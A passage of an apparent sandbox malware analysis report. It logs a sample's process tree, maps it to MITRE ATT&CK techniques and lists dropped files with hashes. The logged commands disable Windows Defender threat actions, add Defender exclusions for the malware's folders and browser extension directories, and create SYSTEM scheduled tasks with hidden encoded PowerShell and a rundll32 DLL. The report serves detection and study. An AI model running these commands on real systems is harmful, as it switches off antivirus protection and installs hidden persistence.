"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
3⤵
PID:1992

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
3⤵
PID:220

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
3⤵
PID:4728

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
3⤵
PID:2092

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
3⤵
PID:1644

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
3⤵
PID:4500

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
3⤵
PID:4172

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
3⤵
PID:1600

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
3⤵
PID:2072

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
3⤵
PID:4276

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
3⤵
PID:752

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
3⤵
PID:2356

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
3⤵
PID:776

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
3⤵
PID:772

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
3⤵
PID:2800

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LmPBUjorYOxoMDhifcR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LmPBUjorYOxoMDhifcR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PHshpGZGOCOU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PHshpGZGOCOU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PKitbTPXU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PKitbTPXU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gIbkOBIdgRUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gIbkOBIdgRUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ujRQKhsomqXgC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ujRQKhsomqXgC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\jbMfBZnRCYwXWnVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\jbMfBZnRCYwXWnVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\AmZMNEdugmHLdDkPv\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\AmZMNEdugmHLdDkPv\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\OrbPdMUPlnYWuuDN\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\OrbPdMUPlnYWuuDN\" /t REG_DWORD /d 0 /reg:64;"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4024

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LmPBUjorYOxoMDhifcR" /t REG_DWORD /d 0 /reg:32
3⤵
PID:2204

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LmPBUjorYOxoMDhifcR" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1976

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LmPBUjorYOxoMDhifcR" /t REG_DWORD /d 0 /reg:64
3⤵
PID:1084

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PHshpGZGOCOU2" /t REG_DWORD /d 0 /reg:32
3⤵
PID:3568

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PHshpGZGOCOU2" /t REG_DWORD /d 0 /reg:64
3⤵
PID:4896

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PKitbTPXU" /t REG_DWORD /d 0 /reg:32
3⤵
PID:2316

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PKitbTPXU" /t REG_DWORD /d 0 /reg:64
3⤵
PID:1460

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gIbkOBIdgRUn" /t REG_DWORD /d 0 /reg:32
3⤵
PID:4620

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gIbkOBIdgRUn" /t REG_DWORD /d 0 /reg:64
3⤵
PID:940

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ujRQKhsomqXgC" /t REG_DWORD /d 0 /reg:32
3⤵
PID:4600

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ujRQKhsomqXgC" /t REG_DWORD /d 0 /reg:64
3⤵
PID:2744

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\jbMfBZnRCYwXWnVB /t REG_DWORD /d 0 /reg:32
3⤵
PID:4644

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\jbMfBZnRCYwXWnVB /t REG_DWORD /d 0 /reg:64
3⤵
PID:3584

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
3⤵
PID:2948

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
3⤵
PID:2532

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
3⤵
PID:3292

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
3⤵
PID:2576

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\AmZMNEdugmHLdDkPv /t REG_DWORD /d 0 /reg:32
3⤵
PID:4612

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\AmZMNEdugmHLdDkPv /t REG_DWORD /d 0 /reg:64
3⤵
PID:4772

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\OrbPdMUPlnYWuuDN /t REG_DWORD /d 0 /reg:32
3⤵
PID:3276

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\OrbPdMUPlnYWuuDN /t REG_DWORD /d 0 /reg:64
3⤵
PID:3020

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gsQBmeRMC" /SC once /ST 03:10:28 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
2⤵
- Creates scheduled task(s)
PID:2908

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gsQBmeRMC"
2⤵
PID:3708

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gsQBmeRMC"
2⤵
PID:1760

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "PihIjSYIYOWYivaIO"
2⤵
PID:2392

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "PihIjSYIYOWYivaIO"
2⤵
PID:1584

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "PihIjSYIYOWYivaIO2"
2⤵
PID:808

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "PihIjSYIYOWYivaIO2"
2⤵
PID:2876

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "uBIqNqVTLsdVwtoMO"
2⤵
PID:1592

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "uBIqNqVTLsdVwtoMO"
2⤵
PID:1332

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "uBIqNqVTLsdVwtoMO2"
2⤵
PID:1084

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "uBIqNqVTLsdVwtoMO2"
2⤵
PID:2132

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "zufPyHRvXFwOAoMLceE"
2⤵
PID:1112

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "zufPyHRvXFwOAoMLceE"
2⤵
PID:4700

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "zufPyHRvXFwOAoMLceE2"
2⤵
PID:3224

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "zufPyHRvXFwOAoMLceE2"
2⤵
PID:3432

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "ALSnKDtOkAsKnYIkHVn"
2⤵
PID:2668

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "ALSnKDtOkAsKnYIkHVn"
2⤵
PID:2040

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "ALSnKDtOkAsKnYIkHVn2"
2⤵
PID:3956

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "ALSnKDtOkAsKnYIkHVn2"
2⤵
PID:2908

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\PKitbTPXU\qoKdeJ.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "fErPICTAIBeQfSA" /V1 /F
2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3896

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "iyUHVhEGVwjqNkM"
2⤵
PID:2084

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "iyUHVhEGVwjqNkM"
2⤵
PID:5080

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "iyUHVhEGVwjqNkM2"
2⤵
PID:2180

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "iyUHVhEGVwjqNkM2"
2⤵
PID:2692

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "oRuAcxXUHxbxlS"
2⤵
PID:2880

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "oRuAcxXUHxbxlS"
2⤵
PID:2904

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "PTILZxjmSMqDI"
2⤵
PID:1364

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "PTILZxjmSMqDI"
2⤵
PID:3536

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "PTILZxjmSMqDI2"
2⤵
PID:4300

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "PTILZxjmSMqDI2"
2⤵
PID:4356

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "fErPICTAIBeQfSA2" /F /xml "C:\Program Files (x86)\PKitbTPXU\fyhOgKr.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:2728

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "fErPICTAIBeQfSA"
2⤵
PID:3692

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "fErPICTAIBeQfSA"
2⤵
PID:2540

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "DHYuWKgDMKXBLX" /F /xml "C:\Program Files (x86)\PHshpGZGOCOU2\QXheQpC.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:1552

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "YnGKDWXrXurgq2" /F /xml "C:\ProgramData\jbMfBZnRCYwXWnVB\QQhOnfA.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:4568

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "uBIqNqVTLsdVwtoMO2" /F /xml "C:\Program Files (x86)\LmPBUjorYOxoMDhifcR\XVDPCEF.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:2948

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "ALSnKDtOkAsKnYIkHVn2" /F /xml "C:\Program Files (x86)\ujRQKhsomqXgC\vNqofae.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:3644

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1604 -s 2276
2⤵
- Program crash
PID:3792

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4480

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
2⤵
PID:3948

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:1160

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:3592

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:1388

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 1604 -ip 1604
1⤵
PID:2624

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\LmPBUjorYOxoMDhifcR\XVDPCEF.xml
Filesize
2KB

MD5
840cc3a1f71109de3084a0b5d5ee07e7

SHA1
185372eb603774e1743a339dc77b6ca2d44afd71

SHA256
b4202bceee6df8ec037f2439e6b42b0c4efa757b65e1e4b4ae3cdd8ba65f5d1d

SHA512
e14966cb74f8898e8672d9502dfc3ffaaf2902262c6301dce1abcfe2eaf35a2232b93eb1c2097bac103f31fbfdfe1dda19e804b8e9508c9c3259ed2043c25819

Download Submit
C:\Program Files (x86)\PHshpGZGOCOU2\QXheQpC.xml
Filesize
2KB

MD5
2937c40fa96c0ab99e91934ed1a3a6bb

SHA1
fd09a2dd23a18ac35b4c9c2a916af3ba0b838bde

SHA256
9b237a9fd852087da116d6c76633191264c186a4aaa38a0690905e0d913f042e

SHA512
9a78d69fe34aab420000645aaa40f031980354978947b5ccdf9d430030da8379bbe1dd59b78bee88f962b8b733ad326f1e0e79aa33a2c94b3d51eb456b7cac58

Download Submit
C:\Program Files (x86)\PKitbTPXU\fyhOgKr.xml
Filesize
2KB

MD5
d7f131e2394e9e3cada4d4c40c2298f4

SHA1
63490c91778d56cef25e4b9cbaceee59f2b80fe1

SHA256
bd5c30f1384a3ed2567dc57294c047296c85c8a78b3449113435bb83cc6593db

SHA512
a8c213329cdaceaa0d97e81d22913480941c8764cfe814e3b78e54c1887cbfeab4d7df9720bb586a04adef6635723640fdd860b0575b3ce72db1cb9176b8a062

Download Submit
C:\Program Files (x86)\ujRQKhsomqXgC\vNqofae.xml
Filesize
2KB

MD5
c68a3f448798f484b0152a756c9b4d7c

SHA1
487729e919b004be69334affed66a896c60a3f29

SHA256
dd2f2597b12e2bea3c6027b51110d46bf1e93034cfc2514f5665c687ba9d24c7

SHA512
aabdc43b8b5c9b993a27d00c0fac4d55b4691e92371df3c6aeee8a53c1bcb125bb4053b825f41070f04f4eaf06134da5b6f76507697ef49e4cb953ca07c566b0

Download Submit
C:\Program Files\Mozilla Firefox\browser\features\{3F73A70E-44C0-48A7-A9B6-A040BC51379C}.xpi
Filesize
641KB

MD5
20bc85d39c32a99132b479ab042cd927

SHA1
b04b0a5da1a6c9777ed1e7c8c8ef80ed3507522a

SHA256
e8fbcbcf3e23c6ec8ecb30f691b9f412e8ceab936d86e49324b854a6e53221ba

SHA512
1cc1490e08d81c46c1c9857cdf5798d88216ea843e99c7bc1d5cf714925abba7e2a808add7c42563de2e7485b6aa995c81b14b7be12fc13b76264cbbb58d2173

Download Submit
C:\ProgramData\jbMfBZnRCYwXWnVB\QQhOnfA.xml
Filesize
2KB

MD5
470b3bd8d0c45ccaa5b3cdc1f00d5697

SHA1
559e71e56471ad584bae3b6b772c64161d49d332

SHA256
24ba25e22a17870504399eb12ef43c77d8cc919453ac91d2aba25582fd083795

SHA512
af40a5703ccac46e57166c672b6c5fe3ddc93186f91368c5a4412c70cd53d08d1c6c8d14f7c76d8fcaf3f2843d9662dd3cf45f0e95f889441ec9817bc495f0cf

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\fpgljbjinlladnbmjndbjoohkjjcmidj\1.1.0_0\_locales\en\messages.json
Filesize
150B

MD5
33292c7c04ba45e9630bb3d6c5cabf74

SHA1
3482eb8038f429ad76340d3b0d6eea6db74e31bd

SHA256
9bb88ea0dcd22868737f42a3adbda7bf773b1ea07ee9f4c33d7a32ee1d902249

SHA512
2439a27828d05bddec6d9c1ec0e23fc9ebb3df75669b90dbe0f46ca05d996f857e6fbc7c895401fecfae32af59a7d4680f83edca26f8f51ca6c00ef76e591754

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\fpgljbjinlladnbmjndbjoohkjjcmidj\1.1.0_0\_locales\pt_BR\messages.json
Filesize
161B

MD5
5c5a1426ff0c1128c1c6b8bc20ca29ac

SHA1
0e3540b647b488225c9967ff97afc66319102ccd

SHA256
5e206dd2dad597ac1d7fe5a94ff8a1a75f189d1fe41c8144df44e3093a46b839

SHA512
1f61809a42b7f34a3c7d40b28aa4b4979ae94b52211b8f08362c54bbb64752fa1b9cc0c6d69e7dab7e5c49200fb253f0cff59a64d98b23c0b24d7e024cee43c4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize
1KB

MD5
def65711d78669d7f8e69313be4acf2e

SHA1
6522ebf1de09eeb981e270bd95114bc69a49cda6

SHA256
aa1c97cdbce9a848f1db2ad483f19caa535b55a3a1ef2ad1260e0437002bc82c

SHA512
05b2f9cd9bc3b46f52fded320b68e05f79b2b3ceaeb13e5d87ae9f8cd8e6c90bbb4ffa4da8192c2bfe0f58826cabff2e99e7c5cc8dd47037d4eb7bfc6f2710a7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\fclobfmgolhdcfcmpbjahiiifilhamcg\1.5.2_0\_locales\es\messages.json
Filesize
186B

MD5
a14d4b287e82b0c724252d7060b6d9e9

SHA1
da9d3da2df385d48f607445803f5817f635cc52d

SHA256
1e16982fac30651f8214b23b6d81d451cc7dbb322eb1242ae40b0b9558345152

SHA512
1c4d1d3d658d9619a52b75bad062a07f625078d9075af706aa0051c5f164540c0aa4dacfb1345112ac7fc6e4d560cc1ea2023735bcf68b81bf674bc2fb8123fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
11KB

MD5
b8f8127cac705be7eceb9111681578d1

SHA1
77d3675ac5224e5a8e9b00a7c37fd0f4055fcca2

SHA256
908db8d4811b770e1821e9f18014b35b55fb324e37c8121490f7bae0ec82c1f7

SHA512
21a6f0be677664b5f707295eb345bab16d67511d969c1f71b86ee622dbdea4977d47981ef9be67c03cc8c86b537429d90e6df3bdd579e23c5b3f92c653fe46ec

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
11KB

MD5
b27eaecd3226e0817745b7c19b71f361

SHA1
bf169d79593b121356539232084bdc26be2c35ad

SHA256
f346f76301af38c759a37c0446c684cba3789f8582c56e7b921318583e8d9ec5

SHA512
c8ee31d7862388b337c585fc5e6c451221998cd73a79cf7826bc2a128f6079a7383c5888e723b92018bf171d6e40496fd7251ac0f4ae92c18951b185d49d628d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dieu0vec.qgs.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\e6zhegwu.default-release\prefs.js
Filesize
7KB

MD5
7cff61993f2997fc2386230315a600d5

SHA1
1b2687575aaf02a055c51ac89962609b68ae0ffe

SHA256
d25d160f438609cfce6851423b225c8bb1545b095f78f9cb13f218fdaa461237

SHA512
56ca913971793ba6975e3f0e3c8df7cd3fea3ce32baae27a0c65ff7b3014df5b9e29fccfd69a9f5d6885c8987a1d2c5e84f07619f5444d7ea6f34e2b6522f4dd

Download Submit
C:\Windows\System32\GroupPolicy\Machine\Registry.pol
Filesize
7KB

MD5
1018ac12987a6526288b3b52bc22396d

SHA1
8ddb30a8ba670620cbe174804034396df925e16b

SHA256
55212b38dc21ba762f0037b5b13312740d31d13913fe81653a4b4c907fd644c1

SHA512
71d03786dde80cea7ee749e2196c95483ba4e366116e927ece8cc1dc9bfb337df60b4adfe706b24f7f707f7f3d3ebf143e9b15809f6b9c7511c902f292475a48

Download Submit
